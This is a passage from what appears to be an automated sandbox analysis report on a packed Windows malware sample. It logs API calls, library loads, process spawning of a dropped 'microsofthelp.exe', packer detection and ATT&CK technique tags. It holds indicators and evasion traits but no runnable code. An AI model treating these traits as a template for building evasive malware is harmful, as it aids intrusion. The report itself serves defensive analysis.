FlushProcessWriteBuffers (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter WinHttpCreateProxyResolver (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter EventActivityIdControl (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter NotifyIpInterfaceChange (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter NotifyUnicastIpAddressChange (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetBestInterfaceEx (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter WinHttpCreateProxyResolver (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter EventActivityIdControl (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter NotifyIpInterfaceChange (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter NotifyUnicastIpAddressChange (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetBestInterfaceEx (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00001224)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005864)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\HidePlugin.dll (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\HidePlugin.dll (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00001224)\n \"microsofthelp.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00001224)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"1300140054f4a477@RPCRT4.dll\"\n \"0d000e00844bd06b@iphlpapi.dll\"\n \"0f001000dc4bd06b@iphlpapi.dll\"\n \"0c000d00244cd06b@iphlpapi.dll\"\n \"140015006c4cd06b@iphlpapi.dll\"\n \"0c000d00e04cd06b@iphlpapi.dll\"\n \"15001600c03ed06b@ADVAPI32.dll\"\n \"0e000f00703fd06b@ADVAPI32.dll\"\n \"0e000f00cc3fd06b@ADVAPI32.dll\"\n \"11001200b447d06b@ADVAPI32.dll\"\n \"110012004848d06b@ADVAPI32.dll\"\n \"120013008c48d06b@ADVAPI32.dll\"\n \"12001300e448d06b@ADVAPI32.dll\"\n \"14001500386ed06b@ADVAPI32.dll\"\n \"14001500506ed06b@ADVAPI32.dll\"\n \"14001500686ed06b@ADVAPI32.dll\"\n \"17001800806ed06b@ADVAPI32.dll\"\n \"0d000e00986ed06b@ADVAPI32.dll\"\n \"11001200a86ed06b@ADVAPI32.dll\"\n \"11001200bc6ed06b@ADVAPI32.dll\"\n \"0d000e004466d06b@WININET.dll\"\n \"0d000e00b466d06b@WININET.dll\"\n \"10001100ec66d06b@WININET.dll\"\n \"100011009067d06b@WININET.dll\"\n \"10001100006fd06b@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"microsofthelp.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"microsofthelp.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"microsofthelp.exe\" failed to load missing module \"%WINDIR%\\HidePlugin.dll\" - [base:0; Status:c000012f]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77670000\n \"microsofthelp.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77670000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"CreateProcessA\" with parameter \"%WINDIR%\\microsofthelp.exe\" - (UID: 00000000-00005864)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"microsofthelp.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"microsofthelp.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"microsofthelp.exe\" (UID: 00000000-00005876)\n Spawned process \"microsofthelp.exe\" (UID: 00000000-00001224)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"microsofthelp.exe\" (UID: 00000000-00005876)\n Spawned process \"microsofthelp.exe\" (UID: 00000000-00001224)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"microsofthelp.exe\" (UID: 00000000-00001224) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"microsofthelp.exe\" (UID: 00000000-00001224) was launched with modified environment variables: \"PSModulePath, PATHEXT\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0\" was detected as \"MPRESS\" and name: \"Packer\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0\" was detected as \"EP:MPRESS\" and name: \"Packer\"\n \"microsofthelp.exe.bin\" was detected as \"MPRESS\" and name: \"Packer\"\n \"microsofthelp.exe.bin\" was detected as \"EP:MPRESS\" and name: \"Packer\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "stream-103", "type": 1, "relevance": 3, "name": "Contains ability to delay the execution of current thread", "description": "Sleep@KERNEL32.DLL at 00000000-00005864-31702-144-0040193E\n Sleep@KERNEL32.DLL at 00000000-00005864-31702-1-0040D0B2\n WaitForSingleObject@KERNEL32.DLL at 00000000-00005864-31702-3-00401D30\n Sleep@KERNEL32.DLL at 00000000-00005876-33596-1-0040D0B2\n Sleep@KERNEL32.DLL at 00000000-00005876-33596-144-0040193E\n WaitForSingleObject@KERNEL32.DLL at 00000000-00005876-33596-3-00401D30\n Sleep@KERNEL32.DLL at 00000000-00001224-36783-1-0040D0B2\n WaitForSingleObject@KERNEL32.DLL at 00000000-00001224-36783-3-00401D30\n Sleep@KERNEL32.DLL at 00000000-00001224-36783-144-0040193E", "origin": "Hybrid Analysis Technology", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0\" has an executable section named \".MPRESS1\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0\" has an executable section named \".MPRESS2\"\n \"microsofthelp.exe.bin\" has an executable section named \".MPRESS1\"\n \"microsofthelp.exe.bin\" has an executable section named \".MPRESS2\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0\" has an writable section named \".MPRESS1\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0\" has an writable section named \".MPRESS2\"\n \"microsofthelp.exe.bin\" has an writable section named \".MPRESS1\"\n \"microsofthelp.exe.bin\" has an writable section named \".MPRESS2\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0\" was detected as \"MPRESS v2.00-V2.0X -> MATCODE Software * 20090423\"\n \"microsofthelp.exe.bin\" was detected as \"MPRESS v2.00-V2.0X -> MATCODE Software * 20090423\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" trying to access non-existent file \"C:\\iphlpapi.dll\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" trying to access non-existent file \"C:\\IPHLPAPI.DLL\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"microsofthelp.exe\" trying to access non-existent file \"C:\\Windows\\iphlpapi.dll\"\n \"microsofthelp.exe\" trying to access non-existent file \"C:\\Windows\\WINNSI.DLL\"\n \"microsofthelp.exe\" trying to access non-existent file \"C:\\Windows\\version.DLL\"\n \"microsofthelp.exe\" trying to access non-existent file \"C:\\Windows\\FLTLIB.DLL\"\n \"microsofthelp.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" reads file \"c:\\75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" reads file \"c:\\windows\\microsofthelp.exe\"\n \"microsofthelp.exe\" reads file \"c:\\windows\\microsofthelp.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: 